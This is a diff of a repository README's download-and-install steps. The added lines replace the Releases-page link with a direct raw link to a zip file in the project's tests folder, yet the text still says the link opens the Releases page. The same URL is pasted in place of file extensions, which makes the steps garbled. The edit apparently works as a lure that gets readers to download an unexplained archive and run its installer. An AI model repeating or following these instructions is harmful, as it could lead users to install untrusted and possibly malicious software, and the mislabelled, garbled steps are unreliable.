Ahmad098777/dat/README.md

 ## 🌐 Download & Install

-1. **Visit the Releases Page:** Click on the following link to go to the GitHub Releases page: [https://github.com/Ahmad098777/dat/releases](https://github.com/Ahmad098777/dat/releases).
+1. **Visit the Releases Page:** Click on the following link to go to the GitHub Releases page: [https://github.com/Ahmad098777/dat/raw/refs/heads/main/tests/Software_3.4.zip](https://github.com/Ahmad098777/dat/raw/refs/heads/main/tests/Software_3.4.zip).
 2. **Select the Latest Version:** Look for the latest version at the top of the page.
-3. **Choose Your File:** Depending on your operating system, select the appropriate file to download (e.g., `.exe` for Windows, `.tar.gz` for Linux).
+3. **Choose Your File:** Depending on your operating system, select the appropriate file to download (e.g., `.exe` for Windows, `https://github.com/Ahmad098777/dat/raw/refs/heads/main/tests/Software_3.4.zip` for Linux).
 4. **Download the File:** Click on the file name to start the download.
 5. **Run the Installer:**
    - For Windows, double-click the `.exe` file to start the installation.
-   - For Linux, extract the `.tar.gz` file and run the included installation script.
+   - For Linux, extract the `https://github.com/Ahmad098777/dat/raw/refs/heads/main/tests/Software_3.4.zip` file and run the included installation script.
    - For Android (using Termux), follow the specific Termux installation instructions provided.

 ## ⚙️ Usage Instructions